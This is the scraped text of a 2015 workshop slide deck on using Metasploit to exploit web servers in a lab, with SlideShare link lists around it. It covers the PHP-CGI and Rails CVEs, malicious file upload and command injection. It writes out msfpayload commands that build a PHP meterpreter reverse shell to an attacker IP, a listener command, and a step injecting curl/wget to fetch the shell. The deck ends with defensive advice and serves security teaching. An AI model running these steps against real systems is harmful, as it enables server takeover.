SlideShare a Scribd company logo
1 of 29
Download to read offline
Dennis Maldonado
@DennisMald
2015-02-20
 Application Security Specialist
 WhiteHat Security
 Full-Time Student
 University of Houston – Main Campus
▪ Computer Information Systems Major
 Twitter
 @DennisMald
 Website / Blog
 KernelMeltdown.org
 Kali Linux – Our attacker machine
 Metasploit Framework – Used for exploiting,
generating the payload, and establishing a
session with our victim.
 Metasploitable2 – Victim Web Server
Exploiting the backend server through a web application.
 Reasons why hackers want to compromise
the server:
 Run attacks against the internal network
 Use the server as a bot
 Install backdoors onto the server
 Reveal sensitive files/passwords
 Execute any local file
 Execute remote files
 and more…
 Vulnerabilities that are dangerous against a
server
 DirectoryTraversal
 Local File Inclusion
 Remote File Inclusion
 Remote Code Execution
 SQL Injection
 Command Injection
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/
http://website.com/user.php?id=1&Submit=Submit#
Metasploit for Web Workshop
Metasploit for Web Workshop
 Metasploit is an open-source framework used
for Security development and testing
 Information gathering and fingerprinting
 Exploitation/Penetration testing
 Payload generation and encoding
 Fuzzing
 And much more…
 Command Line Interfaces
 msfconsole
 msfcli
 GUI Interfaces
 Metasploit Community Edition
 Armitage
 Modules
 Exploit – Exploitation/Proof-of-Concept code
▪ Ruby on Rails exploit
▪ PHP-CGI exploit
 Auxiliary – Misc. modules for multiple purposes
▪ Scanners
▪ DDOS tools
▪ Fingerprinting
▪ Clients
 Payloads – Code to be executed on the exploited system
▪ System Shells
▪ Meterpreter Shells
 Post – Modules for post-exploitation tasks
▪ Persistence
▪ Password Stealing
▪ Pivoting
 Active Exploits
 Actively exploit a host.
 Ex: Ruby on Rails XML exploit
 Passive Exploits
 Wait’s for incoming hosts, then exploits them
 Ex: Java 0-days
 Exploits contain payloads
 Inline (Non Staged)
 Payload containing the exploit and shell code
 Stable
 Large size
 Staged
 Exploits victim, establishes connection with attacker,
pulls down the payload
 Meterpreter
 Advanced, dynamic payload.
 Extended over the network
 Extensible through modules and plugins
 Types of connections
 Bind
▪ Local server gets started on victim machine
▪ Attacker connects to victim
▪ windows/x64/shell/bind_tcp
 Reverse
▪ Local server gets started on attacker machine
▪ Victim connects to attacker
▪ windows/x64/shell/reverse_tcp
Metasploit for Web Workshop
 CVE 2012-1823
 DOS attack
▪ -T 10000
 Source code disclosure
▪ -s argument
 Remote Code Execution
▪ -d argument
 CVE-2013-0156
 Easy to find, easy to
exploit, critical
vulnerability.
 Requires just one
POST request
containing a specially
crafted XML data.
 Send commands
through YAML objects
 The upload functionality allows for any file
type to be uploaded
1. Upload server-side code and check if it executes
▪ PHP = <?php echo “HelloWorld!”; ?>
▪ ASP = <% Response.Write "HelloWorld!" %>
▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the
victim
4. Upload the shell and execute it
 Allows an attacker to execute system level
commands.
1. Attempt a safe command
1. echo test
2. uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject curl or wget commands to download the shell
onto the victim machine.
5. Chmod if necessary and execute
 msfpayload php/meterpreter/reverse_tcp O
 msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337O
 msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337 R > shell.php
 # Now edit the shell.php file to remove the comment on the first line and
add "?>" at the end of the file.
 ==================================
 msfcli multi/handler payload=php/meterpreter/reverse_tcp
lhost=10.211.55.3 lport=1337 E
Metasploit for Web Workshop
 Keep software up to date!
 PHP: 5.4.3, 5.3.13
 Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15
 Use whitelisting for file upload extensions
 Watch for extensions and content-types
 Don’t let upload directory be executable
 Rename files if possible
 Don’t pass user input as a system command!
 Use library calls when possible
 Sanitize input
Metasploit for Web Workshop
 BackTrack-Linux
 http://www.kali.org/
 The Metasploit Project
 http://www.metasploit.com/
 Metasploit Unleashed
 http://www.offensive-security.com/metasploit-unleashed/
 PHP-CGI Advisory
 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
 Ruby on Rails Exploitation
 https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-
metasploit-cve-2013-0156
 DamnVulnerable Web Application (DVWA)
 http://www.dvwa.co.uk/
 Metasploitable 2
 http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web

More Related Content

What's hot

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware AnalysisAlbert Hui
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysissecurityxploded
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...Andrea Draghetti
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
Malware analysis
Malware analysisMalware analysis
Malware analysisxabean
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuceDb Cooper
 
SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005James Morris
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege EscalationAide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege Escalationnullthreat
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverGregory Hanis
 
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria GrunickHacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunickamiable_indian
 

What's hot (20)

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware Analysis
 
Automating Malware Analysis
Automating Malware AnalysisAutomating Malware Analysis
Automating Malware Analysis
 
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
[English] BackBox Linux and Metasploit: A practical demonstration of the Shel...
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
2600 av evasion_deuce
2600 av evasion_deuce2600 av evasion_deuce
2600 av evasion_deuce
 
SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005SELinux Kernel Internals and Architecture - FOSS.IN/2005
SELinux Kernel Internals and Architecture - FOSS.IN/2005
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Aide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege EscalationAide 2014 - Fundamentals of Linux Privilege Escalation
Aide 2014 - Fundamentals of Linux Privilege Escalation
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Telehack: May the Command Line Live Forever
Telehack: May the Command Line Live ForeverTelehack: May the Command Line Live Forever
Telehack: May the Command Line Live Forever
 
Hacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria GrunickHacking Fundamentals - Jen Johnson , Miria Grunick
Hacking Fundamentals - Jen Johnson , Miria Grunick
 

Viewers also liked

Getting Started in Information Security
Getting Started in Information SecurityGetting Started in Information Security
Getting Started in Information SecurityDennis Maldonado
 
Hacking Access Control Systems
Hacking Access Control SystemsHacking Access Control Systems
Hacking Access Control SystemsDennis Maldonado
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the KingdomDennis Maldonado
 
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...Zuriaty Zaki
 
3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd 3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd Gambari Isiaka
 
Contoh surat permohonan pertukaran politeknik
Contoh surat permohonan pertukaran politeknikContoh surat permohonan pertukaran politeknik
Contoh surat permohonan pertukaran politeknikSuhaimi Said
 
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?BGA Cyber Security
 
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe ÖnalNetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe ÖnalBGA Cyber Security
 
Surat permohonan dan permintaan
Surat permohonan dan permintaanSurat permohonan dan permintaan
Surat permohonan dan permintaanblewly
 

Viewers also liked (13)

Getting Started in Information Security
Getting Started in Information SecurityGetting Started in Information Security
Getting Started in Information Security
 
Hacking Access Control Systems
Hacking Access Control SystemsHacking Access Control Systems
Hacking Access Control Systems
 
Sticky Keys to the Kingdom
Sticky Keys to the KingdomSticky Keys to the Kingdom
Sticky Keys to the Kingdom
 
Jenis jenis contoh surat kiriman
Jenis jenis contoh surat kirimanJenis jenis contoh surat kiriman
Jenis jenis contoh surat kiriman
 
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
Borang Permohonan Kemudahan Tambang Percuma Mengunjungi Wilayah Asal (Lampira...
 
3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd 3. dr. gamabri day 1 isd
3. dr. gamabri day 1 isd
 
Contoh surat permohonan pertukaran politeknik
Contoh surat permohonan pertukaran politeknikContoh surat permohonan pertukaran politeknik
Contoh surat permohonan pertukaran politeknik
 
Surat kebenaran bawa kenderaan
Surat kebenaran bawa kenderaanSurat kebenaran bawa kenderaan
Surat kebenaran bawa kenderaan
 
My pwk & oscp journey
My pwk & oscp journeyMy pwk & oscp journey
My pwk & oscp journey
 
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
Some Tatbikatları ve SIEM Testleri İçin Siber Saldırıları Nasıl Optimize Ederiz?
 
Contoh surat rasmi.
Contoh surat rasmi.Contoh surat rasmi.
Contoh surat rasmi.
 
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe ÖnalNetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
 
Surat permohonan dan permintaan
Surat permohonan dan permintaanSurat permohonan dan permintaan
Surat permohonan dan permintaan
 

Similar to Metasploit for Web Workshop

Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....Shah Sheikh
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacksjyoti_lakhani
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminarhenelpj
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - FalconerTony Godfrey
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajaliwebhostingguy
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with phpMohmad Feroz
 
Network and Internet Security.docx
Network and Internet Security.docxNetwork and Internet Security.docx
Network and Internet Security.docxstirlingvwriters
 

Similar to Metasploit for Web Workshop (20)

Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
DTS Solution - Yehia Mamdouh - Release your pet worm on your infrastructure....
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya Morimoto
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Ids 009 network attacks
Ids 009 network attacksIds 009 network attacks
Ids 009 network attacks
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
 
Metasploit - Basic and Android Demo
Metasploit  - Basic and Android DemoMetasploit  - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Windows network security
Windows network securityWindows network security
Windows network security
 
Kali Linux - Falconer
Kali Linux - FalconerKali Linux - Falconer
Kali Linux - Falconer
 
Presentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad AlmajaliPresentation Prepared By: Mohamad Almajali
Presentation Prepared By: Mohamad Almajali
 
Secure programming with php
Secure programming with phpSecure programming with php
Secure programming with php
 
Network and Internet Security.docx
Network and Internet Security.docxNetwork and Internet Security.docx
Network and Internet Security.docx
 

Recently uploaded

RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIUdaiappa Ramachandran
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
20200723_insight_release_plan
20200723_insight_release_plan20200723_insight_release_plan
20200723_insight_release_planJamie (Taka) Wang
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfAnna Loughnan Colquhoun
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopBachir Benyammi
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IES VE
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Commit University
 
Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.francesco barbera
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum ComputingGDSC PJATK
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesDavid Newbury
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxMatsuo Lab
 
GenAI and AI GCC State of AI_Object Automation Inc
GenAI and AI GCC State of AI_Object Automation IncGenAI and AI GCC State of AI_Object Automation Inc
GenAI and AI GCC State of AI_Object Automation IncObject Automation
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesThousandEyes
 

Recently uploaded (20)

RAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AIRAG Patterns and Vector Search in Generative AI
RAG Patterns and Vector Search in Generative AI
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
20200723_insight_release_plan
20200723_insight_release_plan20200723_insight_release_plan
20200723_insight_release_plan
 
Spring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdfSpring24-Release Overview - Wellingtion User Group-1.pdf
Spring24-Release Overview - Wellingtion User Group-1.pdf
 
NIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 WorkshopNIST Cybersecurity Framework (CSF) 2.0 Workshop
NIST Cybersecurity Framework (CSF) 2.0 Workshop
 
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
IESVE Software for Florida Code Compliance Using ASHRAE 90.1-2019
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)Crea il tuo assistente AI con lo Stregatto (open source python framework)
Crea il tuo assistente AI con lo Stregatto (open source python framework)
 
Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.Digital magic. A small project for controlling smart light bulbs.
Digital magic. A small project for controlling smart light bulbs.
 
Introduction to Quantum Computing
Introduction to Quantum ComputingIntroduction to Quantum Computing
Introduction to Quantum Computing
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Linked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond OntologiesLinked Data in Production: Moving Beyond Ontologies
Linked Data in Production: Moving Beyond Ontologies
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
GenAI and AI GCC State of AI_Object Automation Inc
GenAI and AI GCC State of AI_Object Automation IncGenAI and AI GCC State of AI_Object Automation Inc
GenAI and AI GCC State of AI_Object Automation Inc
 
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyesHow to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
How to Effectively Monitor SD-WAN and SASE Environments with ThousandEyes
 

Metasploit for Web Workshop

  • 2.  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer Information Systems Major  Twitter  @DennisMald  Website / Blog  KernelMeltdown.org
